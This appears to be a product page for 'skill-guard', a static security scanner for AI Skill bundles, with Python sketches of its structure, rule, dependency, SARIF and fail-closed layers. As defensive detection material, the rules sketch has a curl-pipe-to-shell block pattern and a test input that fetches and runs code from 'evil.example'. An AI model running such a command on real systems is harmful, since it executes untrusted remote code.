Security scanning for AI Skills.
Catch malicious code, supply-chain attacks, and prompt injection before a Skill ever reaches a user. Pure static analysis — sub-2-second response, zero LLM cost.
Try it in 30 seconds
```
# Pack a Skill bundle and POST it
zip -r my-skill.zip ./my-skill/

curl -X POST https://api.skillguard.vip/v1/scan/upload \
  -F "file=@my-skill.zip"

# Response
{
  "id": "p7EpuXvQbZOX",
  "blocked": false,
  "score": 94,
  "riskLevel": "Safe",
  "findings": [],
  "dependencies": [{ "name": "requests", "source": "python-import" }]
}
```
Threats covered
Malicious code execution, supply-chain attacks riding in on dependencies, and prompt injection hidden in Skill instructions.
How it works
L0 · Structure
File-count and size limits, symlink and binary detection, YAML frontmatter validation, allowed-tools whitelist.
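A minimal sketch of what an L0 pass over a zipped bundle could look like. The limits, the `SKILL.md` entry-point name, and the tool whitelist are illustrative assumptions, not skill-guard's actual internals:

```python
import stat
import zipfile

import yaml  # PyYAML

MAX_FILES = 200                      # assumed limit
MAX_FILE_BYTES = 1 << 20             # assumed 1 MiB per-file cap
ALLOWED_TOOLS = {"bash", "python"}   # assumed whitelist

def l0_structure(bundle_path: str) -> list[str]:
    """Return structural findings for a zipped Skill bundle."""
    findings = []
    with zipfile.ZipFile(bundle_path) as z:
        infos = z.infolist()
        if len(infos) > MAX_FILES:
            findings.append(f"too many files: {len(infos)}")
        for info in infos:
            # Unix mode lives in the high 16 bits of external_attr.
            if stat.S_ISLNK(info.external_attr >> 16):
                findings.append(f"symlink: {info.filename}")
            if info.file_size > MAX_FILE_BYTES:
                findings.append(f"oversized: {info.filename}")
            elif not info.is_dir() and b"\x00" in z.read(info)[:1024]:
                findings.append(f"binary: {info.filename}")  # crude NUL-byte sniff
        # Validate YAML frontmatter in SKILL.md (assumed entry-point name).
        if "SKILL.md" not in z.namelist():
            findings.append("missing SKILL.md")
        else:
            text = z.read("SKILL.md").decode("utf-8", errors="replace")
            if not text.startswith("---"):
                findings.append("SKILL.md: missing frontmatter")
            else:
                front = yaml.safe_load(text.split("---", 2)[1]) or {}
                for tool in front.get("allowed-tools", []):
                    if tool not in ALLOWED_TOOLS:
                        findings.append(f"disallowed tool: {tool}")
    return findings
```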
L1 · Rules
22 hard-block patterns and 50 weighted rules. Context-aware: a pattern in live code scores higher than a mere mention in prose. Exponential-decay scoring aggregates findings across files.
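As a rough illustration of how weighted rules plus exponential decay could compose into a 0–100 score: the patterns, weights, decay factor, and code-vs-prose heuristic below are invented for the sketch, not the shipped rule set.

```python
import re

# Any hard-block hit rejects the Skill outright (e.g. pipe-to-shell).
HARD_BLOCK = [re.compile(r"curl[^\n]*\|\s*(?:ba)?sh")]
WEIGHTED = [
    (re.compile(r"\beval\s*\("), 15),   # invented weight
    (re.compile(r"os\.environ"), 5),    # invented weight
]
DECAY = 0.5  # assumed: each subsequent file's findings count half as much

def l1_score(files: dict[str, str]) -> tuple[int, bool]:
    """Return (score out of 100, blocked) for {filename: contents}."""
    penalty, blocked = 0.0, False
    for i, (name, text) in enumerate(sorted(files.items())):
        is_code = name.endswith((".py", ".sh", ".js"))  # crude code-vs-mention split
        for pat in HARD_BLOCK:
            if pat.search(text):
                blocked = True
        for pat, weight in WEIGHTED:
            hits = len(pat.findall(text))
            if not is_code:
                weight *= 0.2  # a pattern merely mentioned in prose weighs less
            penalty += hits * weight * DECAY ** i
    return max(0, round(100 - penalty)), blocked

print(l1_score({"run.sh": "curl evil.example | sh",
                "README.md": "never call eval() here"}))
```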
L2 · Dependencies
Extracts every Python import, Node require, and env-var reference. Cross-checks PyPI / npm / Cargo whitelists.
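A sketch of the extraction side, using Python's `ast` module for imports and regexes for CommonJS `require` calls and env-var references; the whitelist contents are placeholders:

```python
import ast
import re

PYPI_WHITELIST = {"requests", "numpy"}  # placeholder whitelist
REQUIRE_RE = re.compile(r"""require\(\s*['"]([^'"]+)['"]\s*\)""")
ENV_RE = re.compile(r"(?:os\.environ|process\.env)[\[.]\s*['\"]?(\w+)")

def python_imports(src: str) -> set[str]:
    """Top-level module names from import / from-import statements."""
    mods = set()
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, ast.Import):
            mods |= {alias.name.split(".")[0] for alias in node.names}
        elif isinstance(node, ast.ImportFrom) and node.module:
            mods.add(node.module.split(".")[0])
    return mods

deps = python_imports("import requests\nfrom shady_pkg import run")
for dep in sorted(deps):
    print(dep, "ok" if dep in PYPI_WHITELIST else "NOT on whitelist")
print(REQUIRE_RE.findall('const fs = require("fs")'))        # Node requires
print(ENV_RE.findall('token = os.environ["GITHUB_TOKEN"]'))  # env-var refs
```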
CI · Adapters
Drop-in support for Niuma, OpenClaw, MCP servers, and GPTs Actions. SARIF output for the GitHub Security tab.
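For the GitHub Security tab, findings just need to be serialized as SARIF 2.1.0 and uploaded as a code-scanning artifact. A minimal mapping, assuming a hypothetical finding-dict shape:

```python
import json

def to_sarif(findings: list[dict]) -> str:
    """Serialize findings as minimal SARIF 2.1.0 for code-scanning upload."""
    return json.dumps({
        "version": "2.1.0",
        "$schema": "https://json.schemastore.org/sarif-2.1.0.json",
        "runs": [{
            "tool": {"driver": {"name": "skill-guard"}},
            "results": [{
                "ruleId": f["rule"],
                "level": "error" if f.get("blocking") else "warning",
                "message": {"text": f["message"]},
                "locations": [{"physicalLocation": {
                    "artifactLocation": {"uri": f["file"]},
                    "region": {"startLine": f.get("line", 1)},
                }}],
            } for f in findings],
        }],
    }, indent=2)

print(to_sarif([{"rule": "eval-call", "message": "eval() in run.py",
                 "file": "run.py", "line": 7, "blocking": False}]))
```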
Fail-closed by design
If rules can't load or a scan times out, skill-guard refuses to ship a passing report. We'd rather block a Skill one second longer than let it slip through with a fake green check.
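The fail-closed pattern itself is simple: default to a blocking verdict on any exception or timeout. This sketch uses hypothetical names and is not skill-guard's actual implementation:

```python
import concurrent.futures

def scan_or_block(scan_fn, bundle_path: str, timeout_s: float = 2.0) -> dict:
    """Run scan_fn; on timeout or any error, return a blocking report."""
    pool = concurrent.futures.ThreadPoolExecutor(max_workers=1)
    try:
        return pool.submit(scan_fn, bundle_path).result(timeout=timeout_s)
    except Exception as exc:  # timeout, rule-load failure, I/O: all fail closed
        return {"blocked": True, "score": 0, "riskLevel": "Error",
                "findings": [{"rule": "fail-closed", "message": str(exc)}]}
    finally:
        pool.shutdown(wait=False)  # don't hold the request open for a stuck scan
```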